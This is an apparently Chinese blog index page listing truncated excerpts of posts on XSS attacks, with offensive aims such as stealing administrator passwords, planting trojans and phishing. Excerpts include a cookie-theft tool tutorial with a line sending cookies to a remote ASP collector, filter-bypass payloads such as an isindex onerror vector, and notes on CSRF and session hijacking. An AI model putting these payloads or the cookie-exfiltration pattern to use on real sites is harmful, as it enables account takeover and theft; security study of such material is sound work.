2011年2月14日
XSS使用基础
摘要: XSS使用基础-----------------------------------------------------------1,主要针对小网站--钩管理员的密码,后台2,大网站--直接挂马,在管理员关注的偏区,钩密码,后台3,进行针对性的钓鱼社工------------------------------------------------------------获取COOKIES钓鱼功能挂鱼<img src=javascript:alert('www.google.com')> //博客可用<iframe src=" 阅读全文
posted @ 2011-02-14 11:56 社工 阅读(325) 评论(0) 推荐(0) 编辑
利用最近热门的Xss漏洞能做什么?
摘要: 利用最近热门的Xss漏洞能做什么?利用最近热门的Xss漏洞能做什么?2007-09-05 10:18 来源:希赛网【简 介】或许大家经常看一些高手测试XSS漏洞都是alert一个窗口来。便以为XSS即是如此,当自己alert出窗口来,便说自己发现了漏洞。    或许大家经常看一些高手测试XSS漏洞都是alert一个窗口来。便以为XSS即是如此,当自己alert出窗口来,便说自己发现了漏洞。  其实远没这么简单。你发现的只是程序员的一个小bug而已,远谈不上XSS。它们的关系如同系统漏洞与漏洞利用的关系,不可同日而语。你的系统是否出现过“****内存不能为read&r 阅读全文
posted @ 2011-02-14 11:54 社工 阅读(904) 评论(0) 推荐(0) 编辑
牛B装备 XSS 漏洞利用工具[使用教程]
摘要: 牛B装备 XSS 漏洞利用工具[使用教程]牛B装备 XSS 漏洞利用工具[使用教程]作者:佚名 来源:本站整理 发布时间:2010-05-02 23:42:50 没人爱的猪 DJlyr工具下载地址:http://www.7747.net/Soft/200912/16400.html图片:在工具中,最让人头疼的就是盗取cookie这个版面.绝对有许多人不知道怎么用.现在就说一下流程吧.把生成出来的JS和ASP文件放入空间的根目录中,如果你放的不是根目录,那么就需要修改JS文件.把img.src = "http://www.7747.net/g.asp?key="+str; ( 阅读全文
posted @ 2011-02-14 11:51 社工 阅读(1220) 评论(0) 推荐(0) 编辑
XSS--发掘
摘要: XSS--发掘思路:有输入框的地方-测试代码:主要出现地点:1,博客2,论坛3,邮箱----------------------各大公司被爆:1,曾QQ记录 阅读全文
posted @ 2011-02-14 11:47 社工 阅读(279) 评论(0) 推荐(0) 编辑
IE8 XSS Filter Bypass
摘要: IE8 XSS Filter BypassIE8 XSS Filter BypassWrite by admin in未分类at 2008-09-04 17:58:06漏洞说明:IE8是微软新推出的一款浏览器,其对CSS2.1的完整支持,HTML5的支持,内置开发工具等等。IE8在浏览器安全性上有非常大的改进,内置了一款无法卸载的Xss Filter,对非持久型跨站脚本攻击做了比较好的防护。但是80sec在测试IE8时发现,IE8的Xss Filter存在漏洞,导致在一些东方国家的版本里根本不能阻止URL Xss,譬如在中文版本里,利用一些简单的数据就可以Bypass掉IE8的Filter策略 阅读全文
posted @ 2011-02-14 11:44 社工 阅读(218) 评论(0) 推荐(0) 编辑
CSRF攻击原理解析
摘要: CSRF攻击原理解析CSRF攻击原理解析Write by admin in未分类at 2008-09-21 11:08:19|=—————————————————————& 阅读全文
posted @ 2011-02-14 11:42 社工 阅读(230) 评论(0) 推荐(0) 编辑
一种真正意义上的Session劫持
摘要: 一种真正意义上的Session劫持一种真正意义上的Session劫持Write by admin in未分类at 2008-12-24 12:40:48一种真正意义上的Session劫持Author: jianxin [80sec]EMail: jianxin#80sec.comSite: http://www.80sec.comDate: 2008-12-24From: http://www.80sec.com/release/session-hijacking.txt[ 目录 ]0×00 应用程序认证设计背景0×01 常规攻击思路及缺陷0&t 阅读全文
posted @ 2011-02-14 11:41 社工 阅读(190) 评论(0) 推荐(0) 编辑
2007年--对国内主流邮箱的XSS跨站测试
摘要: 2007年--对国内主流邮箱的XSS跨站测试对国内主流邮箱的跨站测试一、起因其实小雕以前发现过QQ邮箱的跨站问题,不过那个是只能跨群邮件,跨不了普通个人邮件的。于是小雕继续研究,终于有了突破性进展!这一次跨得貌似厉害了点,嘿嘿。126、21cn、sina、tom、sohu、163、QQ这些大学常用的邮箱都存在跨站问题!经测试已经全部成功了,嘿嘿。不过 yahoo、hotmail这几个没有跨出来,鉴于技术和时间都有限,就说说已发现并测试成功的这些吧。貌似也是具有"中国特色"的邮箱跨站哦!二、跨站测试1、126邮箱首先,我们去申请一个126的免费邮箱。这里我们的测试方式是自己给 阅读全文
posted @ 2011-02-14 11:39 社工 阅读(1492) 评论(0) 推荐(0) 编辑
xss简单渗透测试
摘要: xss简单渗透测试xss简单渗透测试Write by admin in未分类at 2009-07-27 11:13:24xss简单渗透测试Author: jianxin [80sec]EMail: jianxin#80sec.comSite: http://www.80sec.comDate: 2008-12-24From:http://www.80sec.com/release/xss-how-to-root.txt[ 目录 ]0×00 前言0×01 xss渗透测试基本思路0×02 一次黑盒的xss渗透测试0×0 阅读全文
posted @ 2011-02-14 11:39 社工 阅读(464) 评论(0) 推荐(0) 编辑
跨站腳本攻擊(XSS):過濾不完的惡夢,又有新攻擊語法!
摘要: 跨站腳本攻擊(XSS):過濾不完的惡夢,又有新攻擊語法!跨站腳本攻擊(XSS):過濾不完的惡夢,又有新攻擊語法!跨站腳本攻擊(Cross Site Scripting,簡稱 XSS,亦翻為跨網站的入侵字串)又有新的攻擊語法!此次觸發惡意腳本不需要用到 script 標籤(譬如 <script>alert(1)</script>),也不用 javascript 協定(譬如 javascript:alert(1)),而是 8 月 26 日所揭露的<isindex type=image src=1 onerror=alert(1) 阅读全文
posted @ 2011-02-14 11:34 社工 阅读(252) 评论(0) 推荐(0) 编辑
下一页
Powered by:
博客园
Copyright © 2024 社工
Powered by .NET 8.0 on Kubernetes